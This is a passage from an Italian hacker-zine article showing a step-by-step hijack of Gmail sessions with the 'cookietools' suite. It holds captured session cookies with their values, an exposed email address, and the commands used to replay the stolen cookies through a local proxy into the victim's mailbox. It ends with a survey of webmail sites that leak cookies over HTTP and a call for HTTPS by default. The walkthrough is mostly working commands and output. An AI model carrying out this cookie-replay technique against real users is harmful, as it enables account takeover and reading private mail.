http://www.google-analytics.com/__utm.gif?utmwv=1&utmn=1884795117&utmcs=UTF-8&utmsr=1280x1024&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=9.0%20r48&utmcn=1&utmhn=mail.google.com&utmr=-&utmp=/support/bin/static.py?page=switchguide.html&switch=1&hl=en&utm_source=wel&utm_medium=wel&utm_campaign=en&utmac=UA-18500-28&utmcc=__utma%3D29003808.1884795117.1196435209.1196435209.1196435209.1%3B%2B__utmb%3D29003808%3B%2B__utmc%3D29003808%3B%2B__utmz%3D29003808.1196435209.1.1.utmcsr%3Dwel%7Cutmccn%3Den%7Cutmcmd%3Dwel%3B%2B
http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=12755&SID=96A8691006BBAC24&RID=28323&zx=slua37-twqo4w&t=1
http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=20444&SID=96A8691006BBAC24&RID=28324&zx=m3s1vh-bc9ie0&t=1
http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=323&SID=96A8691006BBAC24&RID=28325&zx=y44mnn-kcqmx2&t=1
http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=4&SID=96A8691006BBAC24&RID=28326&zx=zab2pw-d61rfe&t=1
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=sent
http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=317&SID=96A8691006BBAC24&RID=28327&zx=jfh2v0-zhb58w&t=1

xenion@gollum:~/dev/cookietools$

Vediamo una fotografia "riassuntiva":

xenion@gollum:~/dev/cookietools$ bin/analyzers/vision.sh logz/
======================== Client 192.168.1.2 ========================

----- Links -----
link[192.168.1.2] http://mail.google.com/mail/
link[192.168.1.2] http://mail.google.com/mail/?view=page&name=browser&ver=rladol3zq8xq
link[192.168.1.2] http://mail.google.com/mail/?ui=2&view=jsm&name=bjs&ids=16filwhcvscm8%2C13rprcb29qq2s&l=0
link[192.168.1.2] http://mail.google.com/mail/?ui=2&view=ss&ver=14ewxrjd6qumb
link[192.168.1.2] http://mail.google.com/mail/?ui=2&view=jsm&name=js&ids=l6215xh4rush%2C1qghp2pit7d3o%2C1gjpjcdlnnvrf%2Cxef1uw092kr9%2Cehspxdexmsdf%2C1j1bm9zyki3nm%2Cgvvmdl1m5azm%2Cpd1tigi3ijf3%2Cns2uitrnb4em%2C1pggb3m6xpyk%2Cjqp8z34i4bcs%2C8vml80v56hdp%2C10gzi33nu1at6%2C7h7d36vi93o1%2C1k1v2aui3j8q9&l=1
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cbj
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&init=1&rt=h&search=inbox
link[192.168.1.2] http://mail.google.com/mail/rc?a=af&c=fff1a8&w=4&h=4
link[192.168.1.2] http://mail.google.com/mail/rc?a=af&c=fff1a8&w=4&h=4
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=ad&ak=l45rs9a37xgdzta72mf4vl6btvla346
link[192.168.1.2] http://mail.google.com/mail/?ui=2&view=jsm&name=cv&ids=3gzy7oqkgypo
link[192.168.1.2] http://mail.google.com/mail/?ui=2&view=jsm&name=cw&ids=1dcbfpf7obz4a
link[192.168.1.2] http://www.google.com/setgmail?zx=vh7ug1-cwwdqw
link[192.168.1.2] http://mail.google.com/mail/?ui=2&view=jsm&name=cw&ids=1dcbfpf7obz4a
link[192.168.1.2] http://mail.google.com/mail/?ui=2&view=jsm&name=ch&ids=ulcv9njsj1gu
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cv&th=1162b4bdf27ec66b&prf=1&usus=1&rt=j&search=inbox
link[192.168.1.2] http://mail.google.com/mail/channel/test?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=90&MODE=init&zx=v6bapv-361emi&t=1
link[192.168.1.2] http://chatenabled.mail.google.com/mail/images/cleardot.gif?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=140&zx=w87cfw-ysbz8h
link[192.168.1.2] http://mail.google.com/mail/channel/test?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=40&TYPE=xmlhttp&zx=pgsaxf-hleg5w&t=1
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=inbox
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=ad&ak=e4pvv0ppwmmfjgepkgk5e51s1636ati
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=au&rt=j
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=1412&RID=28319&CVER=3&zx=vab4un-tq15mu&t=1
link[192.168.1.2] http://mail.google.com/mail/?ui=2&view=jsm&name=cm&ids=dz7eovo1xhaj
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=2182&SID=96A8691006BBAC24&RID=28320&zx=qb2ff0-u2p57r&t=1
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=2175&RID=rpc&SID=96A8691006BBAC24&CI=0&AID=8&TYPE=xmlhttp&zx=ulbq1b-tnwiv4&t=1
link[192.168.1.2] http://mail.google.com/mail/?ui=2&view=jsm&name=e&ids=1ngmlz0gj674u
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=au&rt=j
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cv&fs=1&tf=1&ver=4pcijug8lfzsh3spvl71c9kfl
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cw&fs=1&tf=1&ver=4pcijug8lfzsh3spvl71c9kfl
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cm&fs=1&tf=1&ver=4pcijug8lfzsh3spvl71c9kfl
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=187&SID=96A8691006BBAC24&RID=28321&zx=qm8vej-gct1wq&t=1
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=all
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cv&th=1162b4bdf27ec66b&prf=1&rt=j&search=all
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cv&th=1162b4bdf27ec66b&prf=1&rt=j&search=all
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=spam
link[192.168.1.2] http://mail.google.com/mail/rc?a=af&c=cccccc&w=4&h=4
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=ad&th=1162b4bdf27ec66b&search=inbox
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=1510&SID=96A8691006BBAC24&RID=28322&zx=ph8xes-yj2vnf&t=1
link[192.168.1.2] http://mail.google.com/support/bin/static.py?page=switchguide.html&switch=1&hl=en&utm_source=wel&utm_medium=wel&utm_campaign=en
link[192.168.1.2] http://www.google-analytics.com/__utm.gif?utmwv=1&utmn=1884795117&utmcs=UTF-8&utmsr=1280x1024&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=9.0%20r48&utmcn=1&utmhn=mail.google.com&utmr=-&utmp=/support/bin/static.py?page=switchguide.html&switch=1&hl=en&utm_source=wel&utm_medium=wel&utm_campaign=en&utmac=UA-18500-28&utmcc=__utma%3D29003808.1884795117.1196435209.1196435209.1196435209.1%3B%2B__utmb%3D29003808%3B%2B__utmc%3D29003808%3B%2B__utmz%3D29003808.1196435209.1.1.utmcsr%3Dwel%7Cutmccn%3Den%7Cutmcmd%3Dwel%3B%2B
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=12755&SID=96A8691006BBAC24&RID=28323&zx=slua37-twqo4w&t=1
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=20444&SID=96A8691006BBAC24&RID=28324&zx=m3s1vh-bc9ie0&t=1
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=323&SID=96A8691006BBAC24&RID=28325&zx=y44mnn-kcqmx2&t=1
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=4&SID=96A8691006BBAC24&RID=28326&zx=zab2pw-d61rfe&t=1
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=sent
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=317&SID=96A8691006BBAC24&RID=28327&zx=jfh2v0-zhb58w&t=1

----- Cookies -----
hosts[192.168.1.2:] google.com 

names[192.168.1.2:google.com] GMAIL_AT GMAIL_IMP GMAIL_LOGIN GMAIL_RTT GMAIL_STAT GMAIL_STAT_PENDING GX PREF S SID TZ __utma __utmb __utmc __utmx __utmz gmailchat 
values[192.168.1.2:google.com] 'GMAIL_AT'='xn3j2xo9rptl0x2dpylih9ot3o84x5'
values[192.168.1.2:google.com] 'GMAIL_IMP'='fn-n%2Ftl-v%2Ftl-f%2Fcv-v%2Fcv-pfn-0%2Fcv-p%2Ffn-n%2Ftl-v%2Ftl-f%2Ftl-v'
values[192.168.1.2:google.com] 'GMAIL_LOGIN'='T1196434986128/1196434986128/1196434991464'
values[192.168.1.2:google.com] 'GMAIL_RTT'='203'
values[192.168.1.2:google.com] 'GMAIL_STAT'='/S:a'
values[192.168.1.2:google.com] 'GMAIL_STAT_PENDING'='/S:a'
values[192.168.1.2:google.com] 'GX'='DQAAAG4AAADY6wZGiHdqH9flBuHSLJKHnUhZ6yeWAfnu-DibzNPedKvzrX65AGLN4gX7GUzWVDHUvRtia8U1d1iUTQDhEHJAuWw0H6zMM9cUu7GCJwo0xO9ti4h5ibJn3BY4cbpz9JaMORDyTMYPjNKExV3dZLo5'
values[192.168.1.2:google.com] 'PREF'='ID'
values[192.168.1.2:google.com] 'S'='gmail'
values[192.168.1.2:google.com] 'SID'='DQAAAG4AAADHd05wGtOwIVsWGKHSt2zo_caJx3tnkV79W_hFfOPyAGZWGeztvy52-jR9BdSKchm2XlsNDUVEfAY3Dhod3auXUlilIvnTy_rDIPTbg5ZMHS08IWPEcGHwd6VfiBV7IYwr0j3r2uJoA30wbOzulUKP'
values[192.168.1.2:google.com] 'TZ'='-60'
values[192.168.1.2:google.com] '__utma'='173272373.1028249202.1196434987.1196434987.1196434987.1'
values[192.168.1.2:google.com] '__utmb'='173272373'
values[192.168.1.2:google.com] '__utmc'='173272373'
values[192.168.1.2:google.com] '__utmx'='173272373.00000785162142287121:1:0-0-1-0-0-0'
values[192.168.1.2:google.com] '__utmz'='173272373.1196434987.1.1.utmccn'
values[192.168.1.2:google.com] 'gmailchat'='charlieroot69@gmail.com/769423'

xenion@gollum:~/dev/cookietools$

Nota che con il cookie 'gmailchat' possiamo identificare velocemente chi sta usando Gmail:

xenion@gollum:~/dev/cookietools$ bin/analyzers/occurrences.sh logz/ | grep gmailchat=
    150 gmailchat=charlieroot69@gmail.com/769423;
xenion@gollum:~/dev/cookietools$

Adesso cancelliamo tutti i cookies dal browser con domain "google.com" e "google.it" (in Firefox: Edit -> Preferences -> Privacy -> Cookies -> Show Cookies -> ...) e usiamo cookieserver per ricaricarli, simulando quindi un attacco reale. In questo caso possiamo usare la modalita' statica perche' si tratta di una situazione "controllata" da noi:

xenion@gollum:~/dev/cookietools$ bin/cookieserver/startup.sh logz/ 192.168.1.2 static
checking for: socat sed grep egrep cut cat head sort tail uniq 
checking log directory...
Client: '192.168.1.2' Logdir: 'logz/'
Cookie Server: 127.0.0.1:8181
tmp files will be generated only once (faster but static)
Building tmp files... (logdir: 'logz/' client: '192.168.1.2')
Listening...

Impostiamo il proxy HTTP nel browser a 127.0.0.1:8181 e visitiamo il link 'http://any', ottenendo questa pagina:

CookieServer

Logdir: 'logz/'

Client: '192.168.1.2'

Faking host: any

Cookie hosts (1):

    * google.com

Links (47):

    * http://mail.google.com/mail/
    * http://mail.google.com/mail/?view=page&name=browser&ver=rladol3zq8xq
    * http://mail.google.com/mail/?ui=2&view=jsm&name=bjs&ids=16filwhcvscm8%2C13rprcb29qq2s&l=0
    * http://mail.google.com/mail/?ui=2&view=ss&ver=14ewxrjd6qumb
    * http://mail.google.com/mail/?ui=2&view=jsm&name=js&ids=l6215xh4rush%2C1qghp2pit7d3o%2C1gjpjcdlnnvrf%2Cxef1uw092kr9%2Cehspxdexmsdf%2C1j1bm9zyki3nm%2Cgvvmdl1m5azm%2Cpd1tigi3ijf3%2Cns2uitrnb4em%2C1pggb3m6xpyk%2Cjqp8z34i4bcs%2C8vml80v56hdp%2C10gzi33nu1at6%2C7h7d36vi93o1%2C1k1v2aui3j8q9&l=1
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cbj
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&init=1&rt=h&search=inbox
    * http://mail.google.com/mail/rc?a=af&c=fff1a8&w=4&h=4
    * http://mail.google.com/mail/rc?a=af&c=fff1a8&w=4&h=4
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=ad&ak=l45rs9a37xgdzta72mf4vl6btvla346
    * http://mail.google.com/mail/?ui=2&view=jsm&name=cv&ids=3gzy7oqkgypo
    * http://mail.google.com/mail/?ui=2&view=jsm&name=cw&ids=1dcbfpf7obz4a
    * http://www.google.com/setgmail?zx=vh7ug1-cwwdqw
    * http://mail.google.com/mail/?ui=2&view=jsm&name=cw&ids=1dcbfpf7obz4a
    * http://mail.google.com/mail/?ui=2&view=jsm&name=ch&ids=ulcv9njsj1gu
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cv&th=1162b4bdf27ec66b&prf=1&usus=1&rt=j&search=inbox
    * http://mail.google.com/mail/channel/test?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=90&MODE=init&zx=v6bapv-361emi&t=1
    * http://chatenabled.mail.google.com/mail/images/cleardot.gif?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=140&zx=w87cfw-ysbz8h
    * http://mail.google.com/mail/channel/test?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=40&TYPE=xmlhttp&zx=pgsaxf-hleg5w&t=1
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=inbox
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=ad&ak=e4pvv0ppwmmfjgepkgk5e51s1636ati
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=au&rt=j
    * http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=1412&RID=28319&CVER=3&zx=vab4un-tq15mu&t=1
    * http://mail.google.com/mail/?ui=2&view=jsm&name=cm&ids=dz7eovo1xhaj
    * http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=2182&SID=96A8691006BBAC24&RID=28320&zx=qb2ff0-u2p57r&t=1
    * http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=2175&RID=rpc&SID=96A8691006BBAC24&CI=0&AID=8&TYPE=xmlhttp&zx=ulbq1b-tnwiv4&t=1
    * http://mail.google.com/mail/?ui=2&view=jsm&name=e&ids=1ngmlz0gj674u
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=au&rt=j
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cv&fs=1&tf=1&ver=4pcijug8lfzsh3spvl71c9kfl
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cw&fs=1&tf=1&ver=4pcijug8lfzsh3spvl71c9kfl
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cm&fs=1&tf=1&ver=4pcijug8lfzsh3spvl71c9kfl
    * http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=187&SID=96A8691006BBAC24&RID=28321&zx=qm8vej-gct1wq&t=1
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=all
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cv&th=1162b4bdf27ec66b&prf=1&rt=j&search=all
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cv&th=1162b4bdf27ec66b&prf=1&rt=j&search=all
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=spam
    * http://mail.google.com/mail/rc?a=af&c=cccccc&w=4&h=4
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=ad&th=1162b4bdf27ec66b&search=inbox
    * http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=1510&SID=96A8691006BBAC24&RID=28322&zx=ph8xes-yj2vnf&t=1
    * http://mail.google.com/support/bin/static.py?page=switchguide.html&switch=1&hl=en&utm_source=wel&utm_medium=wel&utm_campaign=en
    * http://www.google-analytics.com/__utm.gif?utmwv=1&utmn=1884795117&utmcs=UTF-8&utmsr=1280x1024&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=9.0%20r48&utmcn=1&utmhn=mail.google.com&utmr=-&utmp=/support/bin/static.py?page=switchguide.html&switch=1&hl=en&utm_source=wel&utm_medium=wel&utm_campaign=en&utmac=UA-18500-28&utmcc=__utma%3D29003808.1884795117.1196435209.1196435209.1196435209.1%3B%2B__utmb%3D29003808%3B%2B__utmc%3D29003808%3B%2B__utmz%3D29003808.1196435209.1.1.utmcsr%3Dwel%7Cutmccn%3Den%7Cutmcmd%3Dwel%3B%2B
    * http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=12755&SID=96A8691006BBAC24&RID=28323&zx=slua37-twqo4w&t=1
    * http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=20444&SID=96A8691006BBAC24&RID=28324&zx=m3s1vh-bc9ie0&t=1
    * http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=323&SID=96A8691006BBAC24&RID=28325&zx=y44mnn-kcqmx2&t=1
    * http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=4&SID=96A8691006BBAC24&RID=28326&zx=zab2pw-d61rfe&t=1
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=sent
    * http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=317&SID=96A8691006BBAC24&RID=28327&zx=jfh2v0-zhb58w&t=1

Set-Cookies (18):

Set-Cookie: GMAIL_AT=xn3j2xo9rptl0x2dpylih9ot3o84x5; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: GMAIL_IMP=EXPIRED; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/;
Set-Cookie: GMAIL_LOGIN=T1196434986128/1196434986128/1196434991464; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: GMAIL_RTT=203; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: GMAIL_STAT=EXPIRED; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/;
Set-Cookie: GMAIL_STAT_PENDING=/S:a=lc&sv=tl&ev=tl&s=13&t=1394&w=521&; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: GX=DQAAAG4AAADY6wZGiHdqH9flBuHSLJKHnUhZ6yeWAfnu-DibzNPedKvzrX65AGLN4gX7GUzWVDHUvRtia8U1d1iUTQDhEHJAuWw0H6zMM9cUu7GCJwo0xO9ti4h5ibJn3BY4cbpz9JaMORDyTMYPjNKExV3dZLo5; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: N_T=sess=5c47c2c1a80020e8&v=2&c=16388f3b&s=47502708&t=s:0:switchguide.html&sessref=; expires=Fri, 30-Nov-07 15:36:48 GMT; path=/support;
Set-Cookie: PREF=ID=38f52b118d41bca7:TM=1196435005:LM=1196435005:GM=1:S=MvwiRzegb4sU8QoM; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: S=gmail=qceQSU5gZHnCMXxJU7dpGQ:gmail_yj=iZRj9Zr6FCLmONTwzQVOfQ:gmproxy=kw6RnIqPqPk:gmproxy_yj=xV-JZ7AkzZI:gmproxy_yj_sub=qNUhkKVM8SQ; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: SID=DQAAAG4AAADHd05wGtOwIVsWGKHSt2zo_caJx3tnkV79W_hFfOPyAGZWGeztvy52-jR9BdSKchm2XlsNDUVEfAY3Dhod3auXUlilIvnTy_rDIPTbg5ZMHS08IWPEcGHwd6VfiBV7IYwr0j3r2uJoA30wbOzulUKP; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: TZ=-60; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: __utma=173272373.1028249202.1196434987.1196434987.1196434987.1; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: __utmb=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: __utmc=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: __utmx=173272373.00000785162142287121:1:0-0-1-0-0-0; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: __utmz=173272373.1196434987.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: gmailchat=charlieroot69@gmail.com/769423; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;

EOF

L'unico cookie host e' google.com, seguiamo il link. A questo punto otteniamo la stessa pagina, ritrovandoci pero' con i cookies di Gmail caricati nel browser. Seguiamo il link 'http://mail.google.com/mail/' dai Links e reimpostiamo la configurazione originale del proxy... siamo dentro!! Sperimentando un po' ho notato che l'unico cookie rilevante per l'autenticazione e' GX, tutti gli altri si possono ignorare (velocemente via bin/cookieserver/subset.sh).

Conclusioni

Ho controllato anche qualche altro servizio web, i risultati sono questi:

http://190.it/

L'auth e' su HTTPS ma poi torna su HTTP.

http://poste.it/

L'auth e' su HTTPS e rimane su HTTPS. Solo un dettaglio, manca il flag Secure nei cookies settati su HTTPS. La sua presenza renderebbe piu' sicuro il servizio in caso di mancato logout da parte dell'utente (che se torna poi sul sito delle poste su HTTP, trasmette il cookie in chiaro).

http://www.libero.it/

L'auth e' su HTTP e rimane su HTTP. Qui passa proprio user e pass in chiaro... sicurezza 0 !!

http://it.yahoo.com/

L'auth e' su HTTPS ma poi torna su HTTP.

http://www.hotmail.com/

L'auth e' su HTTPS ma poi torna su HTTP.

http://mail.google.com/

L'auth e' su HTTPS ma poi torna su HTTP.

http://docs.google.com/

L'auth e' su HTTPS ma poi torna su HTTP.

Tutti sono piu' o meno vulnerabili. La situazione e' allegra e spensierata! Qui sono gli utenti che si devono svegliare e protestare, HTTPS deve essere utilizzato di default come protocollo di trasporto ovunque e sempre in questo genere di servizi. All'URL http://xenion.antifork.org/cookietools/lista/index.html manterro' la versione aggiornata della lista, se vuoi contribuire con nuove segnalazioni e aggiornamenti scrivimi :) Ed ora, siamo arrivati alla fine... ringrazio tutte le persone che mi hanno passivamente supportato nel testing sull'interfaccia wifi0... :P Mi ha fatto piacere tornare su BFi, un saluto a tutti e alla prossima! .x

Links

• BFi: http://www.s0ftpj.org/bfi/
• Articolo originale BFi14-dev-07: http://www.s0ftpj.org/bfi/dev/BFi14-dev-07.tar.gz
• Antifork: http://www.antifork.org
• xenion headquarter: http://xenion.antifork.org
• The Cookie Tools: http://xenion.antifork.org/cookietools/